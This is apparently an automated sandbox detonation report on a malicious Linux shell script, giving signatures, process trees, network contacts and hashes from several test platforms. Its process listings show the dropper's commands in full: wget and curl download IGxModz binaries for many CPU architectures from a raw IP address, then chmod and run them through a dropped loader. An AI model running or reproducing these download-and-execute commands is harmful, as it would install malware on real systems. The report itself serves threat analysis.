Analysis Overview
SHA256
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1
Threat Level: Shows suspicious behavior
The file f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 08:50
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 08:50
Reported
2024-11-21 08:54
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
2s
Max time network
131s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /tmp/3AvA | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/IGxModz.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3AvA | /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh | N/A |
| File opened for modification | /tmp/IGxModz.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.sh4 | /usr/bin/curl | N/A |
Processes
/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.x86]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.x86]
/bin/cat
[cat IGxModz.x86]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mips]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mips]
/bin/cat
[cat IGxModz.mips]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mpsl]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mpsl]
/bin/cat
[cat IGxModz.mpsl]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm4]
/bin/cat
[cat IGxModz.arm4]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm5]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm5]
/bin/cat
[cat IGxModz.arm5]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm6]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm6]
/bin/cat
[cat IGxModz.arm6]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm7]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm7]
/bin/cat
[cat IGxModz.arm7]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.ppc]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.ppc]
/bin/cat
[cat IGxModz.ppc]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.m68k]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.m68k]
/bin/cat
[cat IGxModz.m68k]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.sh4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.sh4]
/bin/cat
[cat IGxModz.sh4]
/bin/chmod
[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| US | 151.101.193.91:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.6:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
/tmp/IGxModz.x86
| MD5 | 960b4fa9d5383373f0a1ea04929df01b |
| SHA1 | f78054d817db7742162a706b5d9f1fedcdf21140 |
| SHA256 | 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a |
| SHA512 | 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 08:50
Reported
2024-11-21 08:54
Platform
debian9-armhf-20240729-en
Max time kernel
8s
Max time network
9s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /tmp/3AvA | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3AvA | /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh | N/A |
| File opened for modification | /tmp/IGxModz.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.m68k | /usr/bin/curl | N/A |
Processes
/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.x86]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.x86]
/bin/cat
[cat IGxModz.x86]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mips]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mips]
/bin/cat
[cat IGxModz.mips]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mpsl]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mpsl]
/bin/cat
[cat IGxModz.mpsl]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm4]
/bin/cat
[cat IGxModz.arm4]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm5]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm5]
/bin/cat
[cat IGxModz.arm5]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm6]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm6]
/bin/cat
[cat IGxModz.arm6]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm7]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm7]
/bin/cat
[cat IGxModz.arm7]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.ppc]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.ppc]
/bin/cat
[cat IGxModz.ppc]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.m68k]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.m68k]
/bin/cat
[cat IGxModz.m68k]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.sh4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.sh4]
/bin/cat
[cat IGxModz.sh4]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
Files
/tmp/IGxModz.x86
| MD5 | 960b4fa9d5383373f0a1ea04929df01b |
| SHA1 | f78054d817db7742162a706b5d9f1fedcdf21140 |
| SHA256 | 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a |
| SHA512 | 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 08:50
Reported
2024-11-21 08:54
Platform
debian9-mipsbe-20240611-en
Max time kernel
29s
Max time network
31s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
